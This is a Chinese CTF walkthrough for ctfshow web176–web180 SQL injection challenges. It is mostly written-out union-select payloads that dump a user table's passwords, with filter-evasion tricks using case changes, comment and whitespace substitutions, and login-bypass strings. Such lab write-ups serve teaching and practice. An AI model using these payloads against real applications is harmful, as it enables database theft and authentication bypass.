目录
1、web176
2、web177
3、web178
4、web179
5、web180
1、web176
1' order by 4--+闭合后简单判断了下字段数是 3
测试联合查询注入,存在关键字的过滤,包括 select 和 union
(后面经过测试实际只过滤了 select)
大小写绕过一下:
0' Union Select 1,2,3--+回显成功
数据库我都懒得查了,直接用 database() 函数回显的结果,查表:
0' Union Select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+得到表名为 ctfshow_user
查该表下的所有列名:
0' Union Select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_user'--+
题目中要求 username !='flag'
我们只查 id 和 password:
0' Union Select 1,id,password from ctfshow_user--+
拿到 flag:ctfshow{4dacb0f6-4795-43f4-8b76-d300234e40b6}
2、web177
测了一下是单引号,但是尝试注释后面的内容发现没有报错但是也没有回显
再用一个分号将后面的闭合,回显成功
可是在判断字段数时又没有回显了
猜测空格被过滤掉了,采用内敛注释绕过,但是这里结尾的分号得用 url 编码的形式,即 %23,不然没有回显示,但是第一个单引号就可以直接用,我也不清楚是什么原因:
1'/**/order/**/by/**/3%23
还是在 4 的时候报错:
直接用上一题的 payload 改,将空格用 /**/ 替换:
0'/**/Union/**/Select/**/1,id,password/**/from/**/ctfshow_user%23
拿到弗兰格:ctfshow{0350cbf2-1553-46c3-bb48-f627bffcae9d}
此外,在前面的 rce 学习中,我们知道空格也可以用 %0a(换行符) 代替:
0'%0aUnion%0aSelect%0a1,id,password%0afrom%0actfshow_user%23
%09 水平制表符 (Tab) 也可以:
0'%09Union%0aSelect%091,id,password%09from%09ctfshow_user%23
3、web178
还是过滤空格,并且过滤了内敛注释,采用后面说的另外的两种方法:
0'%0aUnion%0aSelect%0a1,id,password%0afrom%0actfshow_user%230'%09Union%0aSelect%091,id,password%09from%09ctfshow_user%23
拿到 flag:ctfshow{9555668c-9592-41cd-9b2f-00d9627842b3}
4、web179
将上面的两个 %0a 和 %09 都过滤了,这是要赶尽杀绝啊。
试了下回车符 %0d 发现不行,采用 %0c (换页符)绕过:
0'%0cUnion%0cSelect%0c1,id,password%0cfrom%0cctfshow_user%23
拿到 flag:ctfshow{fd098ddd-f01e-414a-96dd-98548cec2fe3}
还可以采用万能密码:
1'||1%23
5、web180
这里 %23 、注释符都不行了,采用 --%0c 注释,%0c 代替空格:
判断字段数
1'order%0cby%0c3--%0c
字段数还是 3
查数据库名:
0'Union%0cSelect%0c1,2,database()--%0c数据库名为 ctfshow_web
查表名:
0'Union%0cSelect%0c1,2,table_name%0cfrom%0cinformation_schema.tables%0cwhere%0ctable_schema='ctfshow_web'--%0c得到表名为 ctfshow_user
查列名:
0'Union%0cSelect%0c1,2,column_name%0cfrom%0cinformation_schema.columns%0cwhere%0ctable_schema='ctfshow_web'%0cand%0ctable_name='ctfshow_user'--%0c
查 password 就行了:
0'Union%0cSelect%0c1,2,password%0cfrom%0cctfshow_user--%0c
拿到 flag:0'Union%0cSelect%0c1,2,password%0cfrom%0cctfshow_user--%0c
也可以在 union select 里再嵌套一个 select :
0'%0cUnion%0cSelect%0c1,(Select%0cpassword%0cfrom%0cctfshow_user%0cwhere%0cusername='flag'),'3
尝试上一题的万能密码,闭合后面语句,但是只能看到一行的数据:
0'||'1
我们只显示 username 为 flag 的信息:
0'||username='flag
注释掉后面内容,可以显示全部:
0'||1--%0c
